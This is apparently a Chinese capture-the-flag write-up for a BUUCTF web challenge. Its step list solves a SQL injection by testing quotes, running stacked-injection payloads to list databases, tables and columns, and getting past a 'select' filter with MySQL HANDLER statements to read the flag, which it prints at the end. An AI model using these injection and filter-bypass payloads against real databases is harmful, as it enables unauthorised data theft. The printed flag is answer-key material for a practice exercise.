1、来到题目连接页面
2、测试单引号和双引号,单引号报错,双引号没报错
1'
1"
3、使用万能句式
4、使用堆叠注入测试,查看数据库名
1';show databases;#
5、查看表名
1';show tables;#
6、查看FlagHere中字段名
1';show columns from FlagHere;#
7、查看flag字段中的信息,select被过滤了
1';select flag from FlagHere;#
8、使用handler打开表,并读取表中第一个信息
1';handler FlagHere open;handler FlagHere read first; handler FlagHere close;#
9、
标签:web,BUUCTF,FlagHere,查看,show,---,flag,handler,报错 From: https://blog.csdn.net/2201_75556700/article/details/139581997flag{f89fb3d9-fce7-4c96-9e8e-60d3053acc24}